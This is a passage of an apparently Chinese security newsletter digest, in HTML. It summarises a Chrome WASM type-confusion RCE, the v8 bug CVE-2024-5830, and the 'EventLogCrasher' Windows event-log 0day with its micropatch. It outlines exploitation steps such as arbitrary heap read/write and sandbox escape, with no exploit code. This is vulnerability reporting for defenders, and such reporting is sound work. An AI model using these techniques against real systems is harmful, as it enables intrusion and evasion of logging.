	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:chrome 123版本前的rce, 带poc</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Chrome 浏览器出现 RCE 漏洞，可导致任意代码执行</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg4It5AG42AszzdcI5ZuQr3yjbSPURtCzwe9BFE6vHicG7o7Y2ehQszwg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg4It5AG42AszzdcI5ZuQr3yjbSPURtCzwe9BFE6vHicG7o7Y2ehQszwg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855184885881152"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">WASM 类型规范化机制存在设计缺陷，导致在不同模块间的类型比较可能出现类型混淆。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">JS-to-WASM 转换过程中的类型检查机制不够严格，容易被攻击者利用来绕过类型检查。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PartitionAlloc 被认为是 v8 堆沙箱逃逸的一个未被充分关注的攻击向量，尽管它不在 v8 指针压缩笼子的 4GB 范围内，但仍然容易被攻击者利用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过修改 PartitionAlloc 元数据来实现地址泄露，并通过这个漏洞实现任意地址写入，进而完全控制受害者的系统。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞, Google Chrome, 远程代码执行, WASM, 类型混淆</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 Chrome渲染器中的对象转换至远程代码执行漏洞分析</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文详细分析了 Chrome 中的一个类型混淆漏洞 CVE-2024-5830，该漏洞允许远程代码执行（RCE），并通过对 v8 引擎中对象映射和转换机制的深入探讨，展示了如何利用这一漏洞在 Chrome 渲染器沙箱中实现代码执行。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Chrome 渲染器沙箱漏洞 CVE-2024-5830 导致远程代码执行</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">浏览器漏洞利用：利用JavaScript触发内存管理错误实现代码执行</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg8YTp8d927xk8fcXsMaliayZIaUQ8uV43NNDE3jiaaQ3ibKcq7M2Ogz7vQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTg8YTp8d927xk8fcXsMaliayZIaUQ8uV43NNDE3jiaaQ3ibKcq7M2Ogz7vQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844182824552118"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">类型混淆漏洞 CVE-2024-5830：该漏洞源于 v8 引擎中对象 map 的更新过程中出现的类型混淆，允许攻击者在 Chrome 渲染器沙箱中执行任意代码。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对象映射和转换机制的复杂性：v8 引擎中的对象映射和转换是优化属性访问的关键，但同时也是引入安全漏洞的潜在来源。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">字典 map 的意外创建：当对象的属性类型发生变化，且原有 map 无法容纳新的属性转换时，会创建一个字典 map，这在某些情况下可能导致类型混淆。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">v8 堆内存的任意读写：通过控制对象的 map 更新过程，可以实现 v8 堆内存的任意读写，这是利用漏洞实现代码执行的关键步骤。</section></li></ul>
	<br/>
	<p>🏷️: Chrome, RCE, 类型混淆, v8引擎, 漏洞分析</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 远程禁用Windows事件日志的0day漏洞及免费微补丁</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了一个名为 \&#34;EventLogCrasher\&#34; 的 Windows 事件日志服务远程攻击手段，以及提供了一个免费的微补丁来修复这一 0day 漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.521875" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="640" src="https://wechat2rss.xlab.app/img-proxy/?k=af5bd2c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgQI4pmk1kzzYfHgXmLuycg5wHZibxY64gKjhQENPGsaMQzn55xu8kcdw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5" data-w="640" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=8381aa6e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgNt2evWtQI7pBibGWx7eMth6ib0UFEW1how0fT6REjQswZGYujn0rsuqQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="1.5130023640661938" data-w="423" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=d5d63f9b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgqTun71um2Ca3ys4EaJ3J8yL49PFHJ5jncWad1tIHmeQcgPYQpyia2wA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EventLogCrasher 0day 漏洞依然有效，可停止所有域电脑的 Windows 事件日志</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">0patch：修复旧漏洞，顺便还能防0day漏洞</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgVtc2IFehln8OrW9zbdQF5U0n0maYCgKZ0pL8r4oo7YOzfIGibuhxcYw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgVtc2IFehln8OrW9zbdQF5U0n0maYCgKZ0pL8r4oo7YOzfIGibuhxcYw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855184845244551"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
